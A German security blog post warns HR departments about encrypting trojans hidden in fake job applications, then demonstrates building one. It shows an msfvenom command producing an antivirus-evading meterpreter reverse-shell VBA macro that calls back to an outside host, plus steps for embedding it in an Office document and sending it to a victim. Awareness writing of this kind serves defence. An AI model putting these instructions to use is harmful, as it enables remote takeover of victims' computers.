Personalabteilungen aufgepasst!

Personalabteilungen aufgepasst!
Photo by Scott Graham / Unsplash

Ein wirklich gut getarnter Verschlüsselungstrojaner wird derzeit in Bewerbungsmails an Personalabteilungen verschickt. Da die Erpresser wissen, daß Personalabteilungen die Unterlagen sichten müssen, können sie davon ausgehen, daß sie großen Erfolg haben.
Anfällig ist bisher nur Windows, da sich in dem präparierten Excel-Dokument ein VBA-Script befindet. Das Anschreiben selbst liegt gut formuliert als PDF-Datei vor und enthält den Hinweis, daß weitere Informationen über den Bewerber in einer Exceltabelle aufgelistet wären.
Auch die #heiseshow berichtet wieder ausführlich in einem Video, wie dies für den User aussieht und wie man sich am klügsten verhält.
Dabei läßt sich solch ein Trojaner sehr einfach bauen. Um einen Windows Rechner auf diese Weise zu übernehmen, benötigt man lediglich metasploit und ein verlockendes Office-Dokument.

In dieses wird die Malware dann integriert. Dazu baut man zuerst eine Payload mit msfvenom:

root@kali: # msfvenom -a x86 --platform windows -p  windows/meterpreter/reverse_tcp \
LHOST=cnc.netsectrainings.de LPORT=8080 -e x86/shikata_ga_nai -f vba-exe           
Found 1 compatible encoders
Attempting to encode payload with 1 iterations of x86/shikata_ga_nai
x86/shikata_ga_nai succeeded with size 326 (iteration=0)
x86/shikata_ga_nai chosen with final size 326
Payload size: 326 bytes
'**************************************************************
'*
'* This code is now split into two pieces:
'*  1. The Macro. This must be copied into the Office document
'*     macro editor. This macro will run on startup.
'*
'*  2. The Data. The hex dump at the end of this output must be
'*     appended to the end of the document contents.
'*
...

Wie man sieht ist das Script in zwei Teile aufgeteilt. Der erste Teil des Scripts ist das Makro und der Zweite Teil wird an das Dokument angehängt. Das Script kann man nun auf einen Windowsrechner übertragen, um es in das Exceldokument einzubetten. In diesem Beispiel wird der Trojaner sogar mit der Option "-e x86/shikata_ga_nai" verschlüsselt, damit ein Virenscanner auf dem Rechner des Opfers diesen nicht erkennt. Dazu macht man folgendes:

Word/Excel 2003: Werkzeuge -> Makros -> Visual Basic Editor
Word/Excel 2007: Makros anzeigen -> einen Namen wählen, z.B. "Info", dann "erstellen".


Darauf hin öffnet sich der Visual Basic Editor. Hier fügt man nun den ersten Teil des Scripts ein, speichert ab, und fügt den Rest des Scripts in das Word/Excel Dokument selbst ein. Das so entstandene Dokument muss man nur noch an sein Opfer versenden. Wenn dieses dann das Dokument öffnet, baut der Rechner eine Verbindung zu, in unserem Beispiel, cnc.netsectrainings.de auf Port 8080 auf.
Diese Form der Attacke wird auch "Client-Side-Attack" genannt, da der Angreifer das Opfer nicht aus dem Internet erreichen kann. Das Opfer, also der Client, muss die Verbindung zum Angreifer selbst aufbauen. Da die heimische Fritzbox den Unterschied nicht erkennen kann, ob die Verbindung gewollt oder ungewollt stattfindet, läßt sie diese Verbindung immer zu.
Eine solche Verbindung läßt sich auch per https über einen Firmenproxy aufbauen. So würde der Kontakt mit dem Botnet in all den normalen Verbindungen nicht auffallen.
Es ist also nicht leicht für Unternehmen, wenn unaufmerksame Mitarbeiter manipulierte Dokumente ersteinmal geöffnet haben.